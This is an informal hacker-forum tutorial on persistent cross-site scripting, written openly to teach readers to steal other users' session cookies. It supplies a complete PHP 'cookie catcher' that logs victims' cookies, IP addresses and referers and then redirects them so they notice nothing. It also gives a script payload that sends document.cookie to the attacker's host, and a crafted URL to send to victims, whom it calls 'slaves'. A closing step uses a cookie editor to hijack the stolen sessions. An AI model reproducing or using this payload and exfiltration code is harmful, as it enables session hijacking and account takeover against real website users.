Hello Guys !
This is Hacker Cyc|0ne.
I am going teach you How to hack a website through XSS (Persistent Cross Site Scripting).
I wrote it because i didnt find a Nice Tut to explain XSS. I didnt added much pics as I dont want to hack an website for just a tut. But this is pretty much easy and you will learn without much difficulties.
“ Something about XSS “ :-
XSS is basically using java scripts in different forms to get internet details of a user’s profile of respective website. With the help of XSS we can steal the cookies of the owner of the website.
XSS is a very large concept and your success rate depends on your imagination and experience.
Like SQL Injection, keylogging are the certain things, where you follow certain steps to execute something.
Where XSS is just understanding the way we can use java scripts,
and the vulnerabilities of the website may be at the different places for executing your java scripts.
So I could say that XSS or Cross site scripting means to take advantage of web applications that takes the user input but doesn’t filter them properly. This allows an attacker to inject HTML or other codes to get some hidden information out of it. Most common information that people look with
XSS is Cookies. The cookies are used to maintain user authentication of respective website.
“ XSS “ :-
* Search terms :- Almost all of the websites have search boxes where you can try to search something from the website.
In the search box you can type your malicious script and check the vulnerability.
* Text Boxes :- If you see any type of text boxes in the website which will basically let you
put some query in it.
So we are trying to find a place where we can write something, which will later be shown in the same webpage.
“ Types of XSS “ :-
There are 2 types of XSS vulnerability.
1. Persistent Cross Site Scripting
2. Non-persistent Cross site Scripting.
Lets go for Persistent Cross Site Scripting.
“ Persistent Cross Site Scripting “ :-
Persistent Cross Site Scripting vulnerability would take place if the malicious code which you inject would be permanent on respective website. To understand it better. I will give u a little example.
Suppose if you found a forum which is vulnerable to XSS. Then you can make a “New Topic” or “New Thread” in the forum. Every time some user or the admin opens up that particular thread, your code would be executed which wouldn’t have been filtered due to lacks in the security of the website and user’s or admin’s cookies would be sent to you on a “cookie catcher”, which would be a .php file stored on your own website. This website could be a free hosting website.
Lets Suppose we have http://www.Cycl0ne.com.
Its just for Example and actually Cycl0ne ’s website Doesnt exist ! =P
“ Checking for Vulnerability “ :-
Now, the very first thing we will have to see is a place where we can input some text,
and later on that should be displayed.
For example of secure sites,in Hackforums.com, we have a search bar, so in the search bar lets
put “<u>Cycl0ne” and hit enter.
You will see that it will say “Sorry, but no results were returned using the query information you provided.
Please redefine your search terms and try again.”.
But you should notice here that it doesn’t say “No search results found for “<u>Cycl0ne”.
So it means that it is not Echoing the word that we put into the search bar.
So there is no chance to exlpoit the search bar of Hackforums.
“ Testing Java Scripts “ :-
Now, since we know that the website is vulnerable to XSS.
We will try to run a small java script into the website.
<script type=“text/javascript“> alert(‚Cycl0ne‘) </script>
So what this will do is, it will popup a little alert box saying “Cycl0ne” on it.
And if it does that, it means that it accepts the javascripts input as well.
Remember : you can even use – <script type=“text/javascript“> alert(‚your Name‘) </script>
It will show something like –
Once, you’re done just clikc on the „Ok“ or “Preview” button at the bottom.
And in the next page you should get a popup that says “Cycl0ne”.
“ Finding Cookies “ :-
Now, since we have seen that the website IS accepting javascript inputs and executing them on the next page, lets try to do something else with the javascripts. First of all, i want you guyz to understand what are cookies and where do you find them. Type the following command into the address bar of your web browser.
jalert(document.cookie)
As soon as you type that command and hit enter on the keyboard, it should make some popup which will show you your cookies of respective website. Make sure you are logged in to check your cookies. As i said before, cookies are the things which handles the sessions information and logs you in every time you visit the website.
By doing this you can see your own cookies, but it would not help an attack UNLESS, we find some way to get those cookies sent to us.
Now, lets try to find a way to get these cookies sent to us with the help of the java scripts.
“ Creating Cookie Catcher “ :-
Cookie catcher is a file, which you will have to upload to some of your web hosting account, and change its permission to 777 so it can grab the cookies. Copy the following code and paste it to your notepad.
<?php
$cookie = $_GET[‚c‘];
$ip = getenv (‘REMOTE_ADDR’);
$date=date(“j F, Y, g:i a”);;
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
fclose($fp);
header (“Location: http://www.yoursite.com”);
?>
Just a little elaboration about the script. The first statement will get the cookies.
Second statement will get the IP. Third statement will get the referer. T
he last link would send the slave to “Yoursite.com”.
To make it a little less suspecious, you can change the link to Cycl0ne.com,
so the slave wouldnt see anything unusual. so on. Copy the given code and put it into a notepad.
Save it as something.php. Just make sure that you change the format to “.php”.
You’ll need a free webhosting account where you can upload the file. I personally use “spam.com”, so create an account there and upload this php file. Make sure that you change its permissions to “777″.
“ Testing Cookie Catcher “ :-
Now, as you guyz have seen that we have been executing a little script in that page which brings
up an alert bar, lets go a little advanced. Lets try to send our own cookies to our cookie catcher.
<script>document.location=”link-of-your-cookie-catcher?c=” + document.cookies</script>
“ Elaboration on the script “ :-
Document.Location will change the location of the website and we have set it equals to the
link of your cookies catcher and “?c=” we’ve added because its a get statement.
“+ document.cookies” means to visit your cookie catcher with the cookies of your slave’s site
so it can record it.
Now, here is the second
Lets try if it works or not. I am going to using the script that I have shown in the
“Something” page of Cycl0ne.com.
Now, If you click on Ok or Preview, it will take you to yoursite.com OR whatever you have changed
the link to in the Cookie Catcher. Now, lets login back to spam.com account, and you will
notice another “cookies.html” file has been added, automatically.
Now, if you open up the new automatically uploaded file, you will notice some cookies insde that file.
Cookie: undefined
IP: MY IP
Date and Time: 3 April, 2010, 2:03 am
Referer: http://www.cycl0ne.com/preview.php?inclination=0&company=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.yoursite.spam.com%2Fcookiecatcher2.php%3Fc3D%22+%2B+document.cookies%3C%2Fscript%3E&location=whateva&countryId=9&industryId=27&person=whateva&problem=&other=&headline=whateva&incident=whateva&incidentcharsleft=1193&incident_day_select=21&incident_month_select=04&incident_year_select=2009&i[/color]ncident_hour_select=8&incident_min_select=30&incident_AMPM_
select=AM&policyNo=&cellNo=&preview=Preview
Note: This will look a little different from actual cookies, because when i stole these,
i wasnt logged in, so if a user is logged in, then you should get a little different from this.
Now, Get “cookie editor” addon of mozilla firefox.
“ Stealing Actual Cookies “ :-
Till now, we were our own slave, we were trying to steal our own cookies to make sure this works.
Now, lets try to get some actual victims. In the site, you may have to PREVIEW the post first and
then submit it. So the javascript is getting executed whenever you preview it, so we can not
submit it because the script is already executed. And may be in other sites, you can directly
submit the post, so the moment someone opens it, you will get the cookies.
Whenever you put the script in the “NAME” and something something in other fields, you click on preview,
QUICKLY, before it redirects you to the website as described in your cookie stealer,
the URL will change to something else for a moment.
Thats what you will have to copy. What i copied was this.
http://cycl0ne.com/preview.php?inclination=0&company=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.yoursite.spam.com%2Fcookiecatcher.php%3Fc3D%22+%2B+document.cookies%3C%2Fscript%3E&location=whatever&countryId=9&industryId=27&person=whateva&problem=&other=&headline=whateva&incident=whateva&incidentcharsleft=1193&incident_day_select=21&incident_month_select=04&incident_year_select=2009&incident_hour_select=8&incident_min_select=30&incident_AMPM_select=AM&policyNo=&cellNo=&preview=Preview
And then , you just give this link to your slave, as soon as they click ON it, you get the cookies.
It is really useful because in other cases, you wouldn’t have to ask the victims to click on the link,
you will actually submit the report. So as soon as someone reads it you get the cookies.